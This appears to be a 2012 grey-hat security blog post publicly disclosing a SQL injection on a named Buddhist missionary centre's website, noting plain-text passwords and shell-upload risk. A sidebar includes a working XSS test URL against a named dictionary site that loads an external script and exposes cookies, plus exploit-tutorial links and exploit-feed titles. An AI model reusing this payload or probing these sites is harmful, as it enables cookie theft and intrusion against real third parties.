Critical SQL injection (vulnerability) on SITAGU :: Sitagu International Buddhist Missionary Centre

Home / Hacking, News, Security / Critical SQL injection (vulnerability) on SITAGU :: Sitagu International Buddhist Missionary Centre

March 15, 2012 PlanetCreator 0 Comments 0 tags

Security researcher Dr@GoN 3y3 reported another Critical SQL injection (vulnerability) on SITAGU :: Sitagu International Buddhist Missionary Centre http://www.sitaguacademy.com/

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

informed to :- webmaster

This is vulnerability is posted at Vulnerabilities Research Page http://www.planetcreator.net/info

Risk Level : Critical ,Â It’s plain text password, some more, attacker can easily upload hacking shell at posting session, There’s no upload file extension filtering too.

Check Additional Information about this vulnerability at http://www.planetcreator.net/info/exploits/id/107/

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :Â Â Â Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted

Tracking Down A BotNet

This will not be very long, nor will I go into excessive amounts of detail into the tools and steps required. The purpose of this paper is simply to help

Tutorials (overflow, using debugers, exploits coding…)

* Stack based overflows (direct RET overwrite) : (Tutorial Part 1) http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ * Jumping to shellcode : (Tutorial Part 2) http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/ * Stack based overflows – SEH (Tutorial Part 3)

[webapps] Fortinet FortiWeb v8.0.1 - Auth Bypass
on April 6, 2026 at 12:00 am
Fortinet FortiWeb v8.0.1 - Auth Bypass
[webapps] WordPress Madara - Local File Inclusion
on April 6, 2026 at 12:00 am
WordPress Madara - Local File Inclusion
[webapps] WBCE CMS 1.6.4 - Remote Code Execution
on April 6, 2026 at 12:00 am
WBCE CMS 1.6.4 - Remote Code Execution
[webapps] RiteCMS 3.1.0 - Authenticated Remote Code Execution
on April 6, 2026 at 12:00 am
RiteCMS 3.1.0 - Authenticated Remote Code Execution
[webapps] Grafana 11.6.0 - SSRF
on April 6, 2026 at 12:00 am
Grafana 11.6.0 - SSRF